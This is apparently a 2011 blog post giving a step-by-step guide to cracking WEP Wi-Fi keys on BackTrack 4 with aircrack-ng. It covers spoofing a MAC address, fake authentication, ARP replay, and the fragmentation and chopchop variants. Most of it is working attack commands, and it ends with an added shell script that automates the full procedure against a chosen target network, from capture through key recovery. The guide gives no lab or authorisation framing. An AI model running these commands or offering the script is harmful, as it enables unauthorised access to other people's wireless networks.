Thursday, May 26, 2011

Backtrack 4


Or use Gerix Wifi Cracker, the GUI front-end for the same aircrack-ng tools used below.

First, you will need Backtrack 4 BETA, which can be found here.
I use the DVD version; I find it easier. After downloading and burning BT4, put the disc in your computer and restart. It should boot BT4 automatically. You will then be asked to log in:
login: root
pass: toor

After logging in, type in: startx

After that, BT4 should be up and running. Read below to see what you have to do next.

-------------------------------------------------------------------------

NOTES

Each of these is a placeholder (shown in a different color in the original post) for a value you have to substitute when typing the commands below.

wlan0 = your wireless interface (Examples: wlan0, ath0, eth0). If airmon-ng reports that monitor mode was enabled on a separate interface such as mon0, use that name in every command after airmon-ng start.

ch = the channel the target is on (Examples: 6, 11)

bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)

ssid = Name of target (Examples: linksys, default)

filename = prefix of the .cap file airodump-ng writes (Examples: wep123, target, anythingyouwant). airodump-ng appends -01, -02, ... on each run, so the first capture is filename-01.cap.

fragment-*.xor = keystream file written by the fragmentation attack, with * replaced by the number aireplay-ng generates (Example: fragment-25313-0123.xor). The chopchop attack writes replay_dec-*.xor instead.

PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21): aircrack-ng prints the recovered key as colon-separated hex bytes.
Ignore the ":" and enter the hex digits as the WEP key (10 digits for a 64-bit key, 26 for a 128-bit key).

-------------------------------------------------------------------------

WEP CRACK GUIDE

1. Boot the computer with Backtrack 4 (login: root, pass: toor; type "poweroff" when you are done)
2. Open Konsole and type the following:
3. airmon-ng (lists your wireless interfaces; note the name of yours)
4. airmon-ng stop wlan0 ***My interface is wlan0. It may be yours also. Replace every wlan0 with your own interface!***
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0 (sets the spoofed MAC; the same address is passed to every -h option below, so the two must match)
7. airmon-ng start wlan0 (if the output says "monitor mode enabled on mon0", use mon0 instead of wlan0 from here on)
8. airodump-ng wlan0
9. Hit CTRL+C after finding the WEP network you want to crack, then COPY THE BSSID and note its channel (CH column)
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0 (leave this running; it writes (file name)-01.cap)
11. Open a new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0 (fake authentication; it must report "Association successful" before the next step will work)
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0 (ARP request replay; the #Data column in airodump-ng should start climbing quickly)
14. Open a new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap (needs tens of thousands of IVs; if it reports "Failed. Next try with ... IVs", leave it running and it re-reads the capture as it grows)

-------------------------------------------------------------------------

ALTERNATE ATTACKS

FRAGMENTATION
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0 (fake authentication that re-associates every 6000 seconds and sends a keep-alive every 10 seconds; leave it running in its own Konsole)
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0 (fragmentation attack; answer "y" when it asks to use a packet, and on success it writes fragment-*.xor)
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet (builds an encrypted ARP request from the recovered keystream)
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0 (in a new Konsole; if (file name)-01.cap already exists from step 10, this run writes (file name)-02.cap)
6. aireplay-ng -2 -r arp-packet wlan0 (answer "y" to inject the forged packet)
7. aircrack-ng -b (bssid) (file name)-01.cap (use the newest (file name)-NN.cap)

CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0 (chopchop attack; on success it writes replay_dec-*.xor, not fragment-*.xor)
4. Repeat steps 4-7 of the FRAGMENTATION attack, passing the replay_dec-*.xor file to packetforge-ng -y

***Be sure to open new Konsoles when necessary***
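The whole procedure above (the WEP CRACK GUIDE plus the FRAGMENTATION and CHOPCHOP variants) as one parameterised shell script. This is an added example and not part of the original post. The default interface, channel, BSSID, SSID, file name and spoofed MAC are the placeholder values from the NOTES section and are assumptions; override them from the environment. With DRY_RUN=1 (the default) the script only prints the commands it would run, so it can be read on a machine without a wireless adapter; DRY_RUN=0 executes them and requires root on BackTrack with a monitor-mode-capable card.

```shell
#!/bin/sh
# Added example, not from the original post: the WEP guide as a script.
# Placeholder values from the NOTES section (assumptions), overridable from the environment.
IFACE="${IFACE:-wlan0}"
CH="${CH:-6}"
BSSID="${BSSID:-11:22:33:B1:44:C2}"
SSID="${SSID:-linksys}"
FILENAME="${FILENAME:-wep123}"
FAKEMAC="${FAKEMAC:-00:11:22:33:44:55}"
DRY_RUN="${DRY_RUN:-1}"     # 1 = print commands only, 0 = really run them (root + adapter)

run() {                     # foreground command, or just print it in dry-run mode
  if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$*"; else "$@"; fi
}
spawn() {                   # same, but backgrounded: the "open a new Konsole" steps
  if [ "$DRY_RUN" = "1" ]; then run "$@"; else "$@" & fi
}

# On mac80211 drivers airmon-ng leaves wlan0 alone and creates mon0, printing
# "(monitor mode enabled on mon0)"; older drivers print just "(monitor mode enabled)".
# $1 = captured airmon-ng output, $2 = interface name to fall back to.
monitor_iface() {
  name=$(printf '%s\n' "$1" | sed -n 's/.*monitor mode enabled on \([A-Za-z0-9]*\).*/\1/p' | head -n 1)
  printf '%s\n' "${name:-$2}"
}

# airodump-ng numbers its output -01, -02, ... per run; return the newest capture.
latest_capture() { ls "$1"-[0-9][0-9].cap 2>/dev/null | sort | tail -n 1; }

# Keystream file each alternate attack writes: -5 -> fragment-*.xor, -4 -> replay_dec-*.xor
newest_xor() {
  case "$1" in
    fragmentation) ls fragment-*.xor 2>/dev/null | sort | tail -n 1 ;;
    chopchop)      ls replay_dec-*.xor 2>/dev/null | sort | tail -n 1 ;;
  esac
}

# aircrack-ng prints "KEY FOUND! [ 09:87:65:43:21 ]"; the router wants 0987654321.
normalize_key() {
  printf '%s\n' "$1" | sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *\].*/\1/p' | tr -d ':'
}

# Steps 4-7: spoof the MAC and enable monitor mode. Sets MON to the monitor interface.
prepare_iface() {
  run airmon-ng stop "$IFACE"
  run ifconfig "$IFACE" down
  run macchanger --mac "$FAKEMAC" "$IFACE"
  if [ "$DRY_RUN" = "1" ]; then
    run airmon-ng start "$IFACE"; MON="$IFACE"
  else
    MON=$(monitor_iface "$(airmon-ng start "$IFACE")" "$IFACE")
  fi
}

# Steps 10-15 (steps 8-9, finding CH and BSSID with airodump-ng, are done by hand first)
wep_attack() {
  prepare_iface
  spawn airodump-ng -c "$CH" -w "$FILENAME" --bssid "$BSSID" "$MON"
  run   aireplay-ng -1 0 -a "$BSSID" -h "$FAKEMAC" "$MON"
  spawn aireplay-ng -3 -b "$BSSID" -h "$FAKEMAC" "$MON"
  crack
}

# FRAGMENTATION ($1=fragmentation) or CHOPCHOP ($1=chopchop) variant of steps 12-15
alternate_attack() {
  prepare_iface
  spawn aireplay-ng -1 6000 -o 1 -q 10 -e "$SSID" -a "$BSSID" -h "$FAKEMAC" "$MON"
  case "$1" in
    fragmentation) run aireplay-ng -5 -b "$BSSID" -h "$FAKEMAC" "$MON" ;;
    chopchop)      run aireplay-ng -4 -b "$BSSID" -h "$FAKEMAC" "$MON" ;;
  esac
  xor=$(newest_xor "$1"); xor="${xor:-<newest $1 .xor file>}"   # placeholder in dry-run mode
  run packetforge-ng -0 -a "$BSSID" -h "$FAKEMAC" -k 255.255.255.255 -l 255.255.255.255 -y "$xor" -w arp-packet
  spawn airodump-ng -c "$CH" --bssid "$BSSID" -w "$FILENAME" "$MON"
  spawn aireplay-ng -2 -r arp-packet "$MON"
  crack
}

crack() {
  if [ "$DRY_RUN" = "1" ]; then cap="$FILENAME-01.cap"; else cap=$(latest_capture "$FILENAME"); fi
  run aircrack-ng -b "$BSSID" "$cap"
  for pid in $(jobs -p); do kill "$pid"; done   # stop the background capture/replay jobs
  wait
}

case "${1:-}" in
  wep) wep_attack ;;
  fragmentation|chopchop) alternate_attack "$1" ;;
esac
```

Run it as `sh wep.sh wep` to see the command sequence, or `DRY_RUN=0 CH=11 BSSID=... SSID=... sh wep.sh chopchop` on BackTrack to execute the chopchop variant. The script does not select the target for you: run `airodump-ng` by hand first (steps 8-9) and pass the channel and BSSID in.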
